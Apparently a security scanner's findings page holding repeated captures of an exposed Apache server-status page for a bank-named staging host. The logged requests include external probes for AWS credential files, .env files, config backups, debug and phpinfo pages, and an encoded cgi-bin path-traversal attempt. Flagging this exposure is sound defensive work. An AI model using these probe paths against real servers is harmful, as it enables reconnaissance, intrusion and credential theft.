SSReqDurConnChildSlotClientProtocolVHostRequest 0-58-0/0/1137. 0.003390480129060.00.003.89 127.0.0.1http/1.1127.0.1.1:8080POST /debug/default/view?panel=config HTTP/1.1 0-58-0/0/1165. 0.003390480150680.00.004.12 127.0.0.1http/1.1127.0.1.1:8080POST /debug/default/view?panel=config HTTP/1.1 0-58-0/0/1148. 0.003390480126900.00.003.69 127.0.0.1http/1.1127.0.1.1:8080GET /symfony/public/_profiler/phpinfo HTTP/1.1 0-58-0/0/1134. 0.003390480142600.00.005.54 127.0.0.1http/1.1127.0.1.1:8080POST /sapi/debug/default/view HTTP/1.1 0-58-0/0/1161. 0.003390480230570.00.003.77 127.0.0.1http/1.1127.0.1.1:8080POST /phpinfo HTTP/1.1 0-58-0/0/1152. 0.003390480354990.00.005.74 127.0.0.1http/1.1127.0.1.1:8080POST /debug/default/view HTTP/1.1 0-58-0/0/1186. 0.003390480183540.00.0019.75 127.0.0.1http/1.1127.0.1.1:8080GET /aws.yml HTTP/1.1 0-58-0/0/1154. 0.003390480183980.00.0025.62 127.0.0.1http/1.1127.0.1.1:8080GET /.aws/credentials HTTP/1.1 0-58-0/0/1153. 0.003390480156410.00.004.08 127.0.0.1http/1.1127.0.1.1:8080POST /debug/default/view?panel=config/frontend_dev.php HTTP/1.1 0-58-0/0/1142. 0.003390480112340.00.004.25 127.0.0.1http/1.1127.0.1.1:8080POST /frontend/web/debug/default/view HTTP/1.1 0-58-0/0/1131. 0.00339048298810.00.005.05 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 0-58-0/0/1132. 0.003390481342330.00.0025.63 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 0-58-0/0/1127. 0.003390480149300.00.004.83 127.0.0.1http/1.1127.0.1.1:8080GET /config.js HTTP/1.1 0-58-0/0/1147. 0.003390480533170.00.004.76 127.0.0.1http/1.1127.0.1.1:8080POST /.aws/credentials HTTP/1.1 0-58-0/0/1125. 0.003390482135190.00.0012.44 127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1 0-58-0/0/1145. 0.003390480108150.00.003.36 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 0-58-0/0/1143. 0.003390480105370.00.004.57 127.0.0.1http/1.1127.0.1.1:8080POST /config/aws.yml HTTP/1.1 0-58-0/0/1127. 0.003390480188130.00.0012.96 127.0.0.1http/1.1127.0.1.1:8080POST /%C0 HTTP/1.1 0-58-0/0/1129. 0.003390481115990.00.003.39 127.0.0.1http/1.1127.0.1.1:8080POST / HTTP/1.1 0-58-0/0/1139. 0.003390480116320.00.0017.03 127.0.0.1http/1.1127.0.1.1:8080POST /symfony/public/_profiler/phpinfo HTTP/1.1 0-58-0/0/1127. 0.003390480138610.00.004.74 127.0.0.1http/1.1127.0.1.1:8080GET /debug/default/view?panel=config/frontend_dev.php HTTP/1.1 0-58-0/0/1124. 0.003390480218130.00.009.64 127.0.0.1http/1.1127.0.1.1:8080POST /web/debug/default/view HTTP/1.1 0-58-0/0/1138. 0.003390480166610.00.004.84 127.0.0.1http/1.1127.0.1.1:8080POST /debug/default/view?panel=config HTTP/1.1 0-58-0/0/1144. 0.003390480127130.00.004.36 127.0.0.1http/1.1127.0.1.1:8080POST /wp-config.php-backup HTTP/1.1 0-58-0/0/1106. 0.003390480131870.00.003.51 127.0.0.1http/1.1127.0.1.1:8080POST /tool/view/phpinfo.view.php HTTP/1.1 1-6233406990/15/1041_ 0.8538772277870.00.035.52 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 1-6233406990/21/994_ 0.7738775198180.00.044.88 127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1 1-6233406990/25/967_ 0.8332832237930.00.045.39 127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1 1-6233406990/22/1031_ 0.8832881244290.00.035.44 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 1-6233406990/22/1012_ 0.8537324210910.00.046.30 127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1 1-6233406990/27/998_ 0.8337321273770.00.077.92 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 1-6233406990/22/1016_ 0.8837371206440.00.034.66 127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1 1-6233406990/20/1023_ 0.8838821272200.00.034.99 127.0.0.1http/1.1127.0.1.1:8080POST / HTTP/1.1 1-6233406990/20/977_ 0.8738820199740.00.034.77 127.0.0.1http/1.1127.0.1.1:8080GET /.env HTTP/1.1 1-6233406990/20/1034_ 0.7640791232010.00.045.31 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 1-6233406990/19/1011_ 0.8240791303350.00.036.82 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 1-6233406990/22/979_ 0.8740840270330.00.035.24 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 1-6233406990/24/1060_ 0.848920264040.00.045.64 127.0.0.1http/1.1127.0.1.1:8080GET /.env HTTP/1.1 1-6233406990/24/1015_ 0.898920360450.00.037.27 127.0.0.1http/1.1127.0.1.1:8080POST /cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32 1-6233406990/20/992_ 0.8723830556100.00.045.73 127.0.0.1http/1.1127.0.1.1:8080GET /sslmgr HTTP/1.1 1-6233406990/23/1030_ 0.8723830338510.00.046.02 127.0.0.1http/1.1127.0.1.1:8080GET /global-protect/login.esp HTTP/1.1 1-6233406990/26/1005_ 0.8923881178670.00.054.91 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 1-6233406990/18/981_ 0.6826711218220.00.034.51 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 1-6233406990/17/1005_ 0.8726711186100.00.025.13 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 1-6233406990/25/1031_ 0.8926761286510.00.055.55 127.0.0.1http/1.1127.0.1.1:8080POST / HTTP/1.1 1-6233406990/19/971_ 0.8926760272450.00.036.09 127.0.0.1http/1.1127.0.1.1:8080GET /.env HTTP/1.1 1-6233406990/18/992_ 0.8726832276170.00.035.52 127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1 1-6233406990/25/1033_ 0.8426831281330.00.047.32 127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1 1-6233406990/21/990_ 0.8926882189050.00.044.79 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 1-6233406990/21/1003_ 0.8632831253480.00.034.62 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 2-6233406970/49/1011_ 2.172
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31c9c7b251c9c7b251f97bc9c4
Apache Status Apache Server Status for www.algerie.stagingirb.bnpparibas (via 127.0.0.1) Server Version: Apache/2.4.65 (Debian) OpenSSL/1.1.1w Server MPM: event Server Built: 2025-07-29T20:18:46 Current Time: Saturday, 01-Nov-2025 11:39:01 CET Restart Time: Tuesday, 02-Sep-2025 12:14:26 CEST Parent Server Config. Generation: 62 Parent Server MPM Generation: 61 Server uptime: 60 days 24 minutes 34 seconds Server load: 0.01 0.02 0.00 Total accesses: 101100 - Total Traffic: 527.1 MB - Total Duration: 1870670 CPU Usage: u150.11 s211.04 cu171.73 cs59.52 - .0114% CPU load .0195 requests/sec - 106 B/second - 5.3 kB/request - 18.5032 ms/request 1 requests currently being processed, 0 workers gracefully restarting, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusygracefulidlewait-iowritingkeep-aliveclosing 13182809no0yes00250000 23182808no1yes10240010 Sum201 10490010 .........................____________________________W__________ ___________..................................................... ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-58-0/0/1137. 0.002147370129060.00.003.89 127.0.0.1http/1.1127.0.1.1:8080POST /debug/default/view?panel=config HTTP/1.1 0-58-0/0/1165. 0.002147370150680.00.004.12 127.0.0.1http/1.1127.0.1.1:8080POST /debug/default/view?panel=config HTTP/1.1 0-58-0/0/1148. 0.002147370126900.00.003.69 127.0.0.1http/1.1127.0.1.1:8080GET /symfony/public/_profiler/phpinfo HTTP/1.1 0-58-0/0/1134. 0.002147370142600.00.005.54 127.0.0.1http/1.1127.0.1.1:8080POST /sapi/debug/default/view HTTP/1.1 0-58-0/0/1161. 0.002147370230570.00.003.77 127.0.0.1http/1.1127.0.1.1:8080POST /phpinfo HTTP/1.1 0-58-0/0/1152. 0.002147370354990.00.005.74 127.0.0.1http/1.1127.0.1.1:8080POST /debug/default/view HTTP/1.1 0-58-0/0/1186. 0.002147370183540.00.0019.75 127.0.0.1http/1.1127.0.1.1:8080GET /aws.yml HTTP/1.1 0-58-0/0/1154. 0.002147370183980.00.0025.62 127.0.0.1http/1.1127.0.1.1:8080GET /.aws/credentials HTTP/1.1 0-58-0/0/1153. 0.002147370156410.00.004.08 127.0.0.1http/1.1127.0.1.1:8080POST /debug/default/view?panel=config/frontend_dev.php HTTP/1.1 0-58-0/0/1142. 0.002147370112340.00.004.25 127.0.0.1http/1.1127.0.1.1:8080POST /frontend/web/debug/default/view HTTP/1.1 0-58-0/0/1131. 0.00214737298810.00.005.05 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 0-58-0/0/1132. 0.002147371342330.00.0025.63 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 0-58-0/0/1127. 0.002147370149300.00.004.83 127.0.0.1http/1.1127.0.1.1:8080GET /config.js HTTP/1.1 0-58-0/0/1147. 0.002147370533170.00.004.76 127.0.0.1http/1.1127.0.1.1:8080POST /.aws/credentials HTTP/1.1 0-58-0/0/1125. 0.002147372135190.00.0012.44 127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1 0-58-0/0/1145. 0.002147370108150.00.003.36 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 0-58-0/0/1143. 0.002147370105370.00.004.57 127.0.0.1http/1.1127.0.1.1:8080POST /config/aws.yml HTTP/1.1 0-58-0/0/1127. 0.002147370188130.00.0012.96 127.0.0.1http/1.1127.0.1.1:8080POST /%C0 HTTP/1.1 0-58-0/0/1129. 0.002147371115990.00.003.39 127.0.0.1http/1.1127.0.1.1:8080POST / HTTP/1.1 0-58-0/0/1139. 0.002147370116320.00.0017.03 127.0.0.1http/1.1127.0.1.1:8080POST /symfony/public/_profiler/phpinfo HTTP/1.1 0-58-0/0/1127. 0.002147370138610.00.004.74 127.0.0.1http/1.1127.0.1.1:8080GET /debug/default/view?panel=config/frontend_dev.php HTTP/1.1 0-58-0/0/1124. 0.002147370218130.00.009.64 127.0.0.1http/1.1127.0.1.1:8080POST /web/debug/default/view HTTP/1.1 0-58-0/0/1138. 0.002147370166610.00.004.84 127.0.0.1http/1.1127.0.1.1:8080POST /debug/default/view?panel=config HTTP/1.1 0-58-0/0/1144. 0.002147370127130.00.004.36 127.0.0.1http/1.1127.0.1.1:8080POST /wp-config.php-backup HTTP/1.1 0-58-0/0/1106. 0.002147370131870.00.003.51 127.0.0.1http/1.1127.0.1.1:8080POST /tool/view/phpinfo.view.php HTTP/1.1 1-6131828090/7/1014_ 0.314722277680.00.015.48 127.0.0.1http/1.1127.0.1.1:8080GET proxypool.top:443 HTTP/1.1 1-6131828090/8/964_ 0.364720197840.00.014.83 127.0.0.1http/1.1127.0.1.1:8080GET /www.central.stagingirb.bnpparibas.tar.xz HTTP/1.1 1-6131828090/9/934_ 0.363212237660.00.015.34 127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1 1-6131828090/11/1001_ 0.3730253244050.00.015.39 127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1 1-6131828090/5/980_ 0.393261210620.00.016.25 127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1 1-6131828090/3/960_ 0.2134710273410.00.007.83 127.0.0.1http/1.1127.0.1.1:8080GET /aspera/faspex/ HTTP/1.1 1-6131828090/8/983_ 0.2634715206180.00.014.62 127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1 1-6131828090/8/992_ 0.2730202271870.00.014.94 127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1 1-6131828090/5/946_ 0.2430200199490.00.004.72 127.0.0.1http/1.1127.0.1.1:8080GET /aspera/faspex/ HTTP/1.1 1-6131828090/12/1007_ 0.3728762231760.00.025.26 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 1-6131828090/7/981_ 0.394771303110.00.016.78 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 1-6131828090/9/946_ 0.3625720270050.00.025.19 127.0.0.1http/1.1127.0.1.1:8080GET /www.central.stagingirb.bnpparibas.tar.gz HTTP/1.1 1-6131828090/9/1026_ 0.3625720263810.00.025.59 127.0.0.1http/1.1127.0.1.1:8080GET /www.central.stagingirb.bnpparibas.zip HTTP/1.1 1-6131828090/7/981_ 0.3825771360270.00.017.23 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 1-6131828090/7/960_ 0.3626720555820.00.015.67 127.0.0.1http/1.1127.0.1.1:8080GET /central.stagingirb.bnpparibas.tar.xz HTTP/1.1 1-6131828090/8/996_ 0.3626720338220.00.015.96 127.0.0.1http/1.1127.0.1.1:8080GET /www.algerie.stagingirb.bnpparibas.tar.bz2 HTTP/1.1 1-6131828090/8/971_ 0.3826770178360.00.014.86 127.0.0.1http/1.1127.0.1.1:8080GET /robots.txt HTTP/1.1 1-6131828090/7/952_ 0.3627210218020.00.014.46 127.0.0.1http/1.1127.0.1.1:8080GET /www.algerie.stagingirb.bnpparibas.tar.gz HTTP/1.1 1-6131828090/9/976_ 0.3627210185910.00.015.10 127.0.0.1http/1.1127.0.1.1:8080GET /central.stagingirb.bnpparibas.tar.gz HTTP/1.1 1-6131828090/11/999_ 0.3734761286070.00.025.49 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 1-6131828090/8/944_ 0.3827263272170.00.026.05 127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1 1-6131828090/4/962_ 0.2036201275870.00.015.47 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 1-6131828090/3/997_ 0.2428711280960.00.007.27 127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1 1-6131828090/7/957_ 0.263212188730.00.024.73 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 1-6131828090/8/969_ 0.3228710253170.00.014.5
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31c9c7b251c9c7b2510c94759a
Apache Status Apache Server Status for www.algerie.stagingirb.bnpparibas (via 127.0.0.1) Server Version: Apache/2.4.65 (Debian) OpenSSL/1.1.1w Server MPM: event Server Built: 2025-07-29T20:18:46 Current Time: Thursday, 30-Oct-2025 16:28:32 CET Restart Time: Tuesday, 02-Sep-2025 12:14:26 CEST Parent Server Config. Generation: 60 Parent Server MPM Generation: 59 Server uptime: 58 days 5 hours 14 minutes 5 seconds Server load: 0.05 0.05 0.07 Total accesses: 91756 - Total Traffic: 421.4 MB - Total Duration: 1055975 CPU Usage: u148.42 s205.02 cu145.41 cs54.36 - .011% CPU load .0182 requests/sec - 87 B/second - 4815 B/request - 11.5085 ms/request 1 requests currently being processed, 0 workers gracefully restarting, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusygracefulidlewait-iowritingkeep-aliveclosing 12512022no1yes10240010 22511948no0yes00250000 Sum201 10490010 ........................._______W_______________________________ ___________..................................................... ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-58-0/0/1137. 0.00593080129060.00.003.89 127.0.0.1http/1.1127.0.1.1:8080POST /debug/default/view?panel=config HTTP/1.1 0-58-0/0/1165. 0.00593080150680.00.004.12 127.0.0.1http/1.1127.0.1.1:8080POST /debug/default/view?panel=config HTTP/1.1 0-58-0/0/1148. 0.00593080126900.00.003.69 127.0.0.1http/1.1127.0.1.1:8080GET /symfony/public/_profiler/phpinfo HTTP/1.1 0-58-0/0/1134. 0.00593080142600.00.005.54 127.0.0.1http/1.1127.0.1.1:8080POST /sapi/debug/default/view HTTP/1.1 0-58-0/0/1161. 0.00593080230570.00.003.77 127.0.0.1http/1.1127.0.1.1:8080POST /phpinfo HTTP/1.1 0-58-0/0/1152. 0.00593080354990.00.005.74 127.0.0.1http/1.1127.0.1.1:8080POST /debug/default/view HTTP/1.1 0-58-0/0/1186. 0.00593080183540.00.0019.75 127.0.0.1http/1.1127.0.1.1:8080GET /aws.yml HTTP/1.1 0-58-0/0/1154. 0.00593080183980.00.0025.62 127.0.0.1http/1.1127.0.1.1:8080GET /.aws/credentials HTTP/1.1 0-58-0/0/1153. 0.00593080156410.00.004.08 127.0.0.1http/1.1127.0.1.1:8080POST /debug/default/view?panel=config/frontend_dev.php HTTP/1.1 0-58-0/0/1142. 0.00593080112340.00.004.25 127.0.0.1http/1.1127.0.1.1:8080POST /frontend/web/debug/default/view HTTP/1.1 0-58-0/0/1131. 0.0059308298810.00.005.05 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 0-58-0/0/1132. 0.00593081342330.00.0025.63 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 0-58-0/0/1127. 0.00593080149300.00.004.83 127.0.0.1http/1.1127.0.1.1:8080GET /config.js HTTP/1.1 0-58-0/0/1147. 0.00593080533170.00.004.76 127.0.0.1http/1.1127.0.1.1:8080POST /.aws/credentials HTTP/1.1 0-58-0/0/1125. 0.00593082135190.00.0012.44 127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1 0-58-0/0/1145. 0.00593080108150.00.003.36 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 0-58-0/0/1143. 0.00593080105370.00.004.57 127.0.0.1http/1.1127.0.1.1:8080POST /config/aws.yml HTTP/1.1 0-58-0/0/1127. 0.00593080188130.00.0012.96 127.0.0.1http/1.1127.0.1.1:8080POST /%C0 HTTP/1.1 0-58-0/0/1129. 0.00593081115990.00.003.39 127.0.0.1http/1.1127.0.1.1:8080POST / HTTP/1.1 0-58-0/0/1139. 0.00593080116320.00.0017.03 127.0.0.1http/1.1127.0.1.1:8080POST /symfony/public/_profiler/phpinfo HTTP/1.1 0-58-0/0/1127. 0.00593080138610.00.004.74 127.0.0.1http/1.1127.0.1.1:8080GET /debug/default/view?panel=config/frontend_dev.php HTTP/1.1 0-58-0/0/1124. 0.00593080218130.00.009.64 127.0.0.1http/1.1127.0.1.1:8080POST /web/debug/default/view HTTP/1.1 0-58-0/0/1138. 0.00593080166610.00.004.84 127.0.0.1http/1.1127.0.1.1:8080POST /debug/default/view?panel=config HTTP/1.1 0-58-0/0/1144. 0.00593080127130.00.004.36 127.0.0.1http/1.1127.0.1.1:8080POST /wp-config.php-backup HTTP/1.1 0-58-0/0/1106. 0.00593080131870.00.003.51 127.0.0.1http/1.1127.0.1.1:8080POST /tool/view/phpinfo.view.php HTTP/1.1 1-5925120220/56/825_ 3.439065190.00.282.84 127.0.0.1http/1.1127.0.1.1:8080POST /api/gql HTTP/1.1 1-5925120220/49/797_ 3.439033950.00.142.54 127.0.0.1http/1.1127.0.1.1:8080POST /graphql/api HTTP/1.1 1-5925120220/58/769_ 3.437095780.00.353.35 127.0.0.1http/1.1127.0.1.1:8080GET /swagger/swagger-ui.html HTTP/1.1 1-5925120220/61/804_ 3.446051490.00.263.22 127.0.0.1http/1.1127.0.1.1:8080GET /swagger.json HTTP/1.1 1-5925120220/45/821_ 3.437084950.00.274.48 127.0.0.1http/1.1127.0.1.1:8080GET /webjars/swagger-ui/index.html HTTP/1.1 1-5925120220/56/779_ 3.450077300.00.265.12 127.0.0.1http/1.1127.0.1.1:8080GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 1-5925120220/65/805_ 3.438095280.00.383.09 127.0.0.1http/1.1127.0.1.1:8080GET /swagger/index.html HTTP/1.1 1-59251202225/45/809W 3.380064590.00.303.19 127.0.0.1http/1.1127.0.1.1:8080GET /server-status HTTP/1.1 1-5925120220/51/773_ 3.443081480.00.302.98 127.0.0.1http/1.1127.0.1.1:8080GET /@vite/env HTTP/1.1 1-5925120220/63/819_ 3.442063480.00.303.29 127.0.0.1http/1.1127.0.1.1:8080GET /.vscode/sftp.json HTTP/1.1 1-5925120220/51/805_ 3.445071710.00.294.40 127.0.0.1http/1.1127.0.1.1:8080GET /v2/api-docs HTTP/1.1 1-5925120220/53/772_ 3.444088660.00.453.48 127.0.0.1http/1.1127.0.1.1:8080GET /api-docs/swagger.json HTTP/1.1 1-5925120220/64/849_ 3.450074080.00.363.69 127.0.0.1http/1.1127.0.1.1:8080GET /v2/_catalog HTTP/1.1 1-5925120220/55/802_ 3.444071610.00.274.56 127.0.0.1http/1.1127.0.1.1:8080GET /api/swagger.json HTTP/1.1 1-5925120220/51/783_ 3.445044230.00.222.97 127.0.0.1http/1.1127.0.1.1:8080GET /v3/api-docs HTTP/1.1 1-5925120220/53/814_ 3.443097340.00.312.48 127.0.0.1http/1.1127.0.1.1:8080GET /actuator/env HTTP/1.1 1-5925120220/49/784_ 3.442030860.00.302.90 127.0.0.1http/1.1127.0.1.1:8080GET /server HTTP/1.1 1-5925120220/53/788_ 3.451076310.00.342.59 127.0.0.1http/1.1127.0.1.1:8080GET /about HTTP/1.1 1-5925120220/63/790_ 3.451076370.00.463.52 127.0.0.1http/1.1127.0.1.1:8080GET /debug/default/view?panel=config HTTP/1.1 1-5925120220/53/827_ 3.4311093300.00.213.52 127.0.0.1http/1.1127.0.1.1:8080POST /graphql HTTP/1.1 1-5925120220/44/767_ 3.4310066280.00.133.15 127.0.0.1http/1.1127.0.1.1:8080POST /api HTTP/1.1 1-5925120220/58/795_ 3.4312149280.00.322.94 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 1-5925120220/53/817_ 3.4380119370.00.374.97 127.0.0.1http/1.1127.0.1.1:8080GET /swagger-ui.html HTTP/1.1 1-5925120220/48/778_ 3.4310043810.00.182.39 127.0.0.1http/1.1127.0.1.1:8080POST /api/graphql HTTP/1.1 1-5925120220/55/803_ 3.4460104520.00.282.76 127.0.0.1http/1.1127.0.1.1:8080GET /swagger/v1/swagger.json HTTP/1.1 2-5925119480/23
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31c9c7b251c9c7b251ac9b0c41
Apache Status Apache Server Status for www.algerie.stagingirb.bnpparibas (via 127.0.0.1) Server Version: Apache/2.4.65 (Debian) OpenSSL/1.1.1w Server MPM: event Server Built: 2025-07-29T20:18:46 Current Time: Sunday, 26-Oct-2025 07:02:05 CET Restart Time: Tuesday, 02-Sep-2025 12:14:26 CEST Parent Server Config. Generation: 56 Parent Server MPM Generation: 55 Server uptime: 53 days 19 hours 47 minutes 38 seconds Server load: 0.00 0.01 0.00 Total accesses: 82601 - Total Traffic: 354.8 MB - Total Duration: 453950 CPU Usage: u134.68 s189.12 cu130.08 cs49.63 - .0108% CPU load .0178 requests/sec - 80 B/second - 4504 B/request - 5.4957 ms/request 1 requests currently being processed, 0 workers gracefully restarting, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusygracefulidlewait-iowritingkeep-aliveclosing 01793900no0yes00250000 21793899no1yes10240010 Sum201 10490010 _________________________.........................____W_________ ___________..................................................... ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-5517939000/3/1005_ 0.25361158980.00.013.28 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 0-5517939000/3/1023_ 0.25166336700.00.013.29 127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1 0-5517939000/2/1022_ 0.11356130290.00.002.61 127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1 0-5517939000/6/1014_ 0.22356138630.00.023.02 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 0-5517939000/7/1037_ 0.25162073800.00.022.97 127.0.0.1http/1.1127.0.1.1:8080GET /cgi-bin/luci/;stok=/locale HTTP/1.1 0-5517939000/4/1030_ 0.111571100620.00.013.99 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 0-5517939000/4/1038_ 0.20157061880.00.0118.30 127.0.0.1http/1.1127.0.1.1:8080GET /robots.txt HTTP/1.1 0-5517939000/4/1022_ 0.224556190980.00.0124.40 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 0-5517939000/5/1022_ 0.234853178610.00.023.06 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 0-5517939000/2/1008_ 0.114848019880.00.003.08 127.0.0.1http/1.1127.0.1.1:8080GET /.env HTTP/1.1 0-5517939000/5/1008_ 0.214848027550.00.013.89 127.0.0.1http/1.1127.0.1.1:8080GET /license.txt HTTP/1.1 0-5517939000/6/998_ 0.2346663168920.00.0123.86 127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1 0-5517939000/1/991_ 0.054661145140.00.003.51 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 0-5517939000/4/1013_ 0.214661075540.00.013.46 127.0.0.1http/1.1127.0.1.1:8080GET /favicon.ico HTTP/1.1 0-5517939000/8/1000_ 0.234561166790.00.0211.75 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 0-5517939000/3/1024_ 0.134556039840.00.012.69 127.0.0.1http/1.1127.0.1.1:8080GET /wp-json HTTP/1.1 0-5517939000/7/1013_ 0.244066338090.00.013.00 127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1 0-5517939000/3/1009_ 0.224061060100.00.0011.42 127.0.0.1http/1.1127.0.1.1:8080GET /login/ HTTP/1.1 0-5517939000/4/999_ 0.134061142170.00.012.74 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 0-5517939000/7/1028_ 0.243661148110.00.0115.52 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 0-5517939000/4/1001_ 0.223656172140.00.013.92 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 0-5517939000/2/997_ 0.133656063830.00.008.58 127.0.0.1http/1.1127.0.1.1:8080POST /cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32 0-5517939000/5/1012_ 0.252161182560.00.024.02 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 0-5517939000/7/1021_ 0.222156158770.00.013.42 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 0-5517939000/2/994_ 0.112156145460.00.002.59 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 1-51-0/0/769. 0.00288114037140.00.002.56 127.0.0.1http/1.1127.0.1.1:8080GET /favicon.ico HTTP/1.1 1-51-0/0/748. 0.00288114128750.00.002.41 127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1 1-51-0/0/711. 0.00288114133280.00.003.00 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 1-51-0/0/743. 0.00288114031970.00.002.96 127.0.0.1http/1.1127.0.1.1:8080POST /cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32 1-51-0/0/776. 0.00288114158970.00.004.21 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 1-51-0/0/723. 0.00288114138170.00.004.86 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 1-51-0/0/740. 0.00288114142370.00.002.70 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 1-51-0/0/764. 0.00288114620670.00.002.88 127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1 1-51-0/0/722. 0.00288114323290.00.002.68 127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1 1-51-0/0/756. 0.00288114031830.00.003.00 127.0.0.1http/1.1127.0.1.1:8080GET /owa/auth/logon.aspx HTTP/1.1 1-51-0/0/754. 0.00288114244710.00.004.10 127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1 1-51-0/0/719. 0.00288114045320.00.003.03 127.0.0.1http/1.1127.0.1.1:8080GET /robots.txt HTTP/1.1 1-51-0/0/785. 0.00288114135140.00.003.33 127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1 1-51-0/0/747. 0.00288114532720.00.004.29 127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1 1-51-0/0/732. 0.00288114135850.00.002.75 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 1-51-0/0/761. 0.00288114361760.00.002.17 127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1 1-51-0/0/735. 0.00288114416920.00.002.60 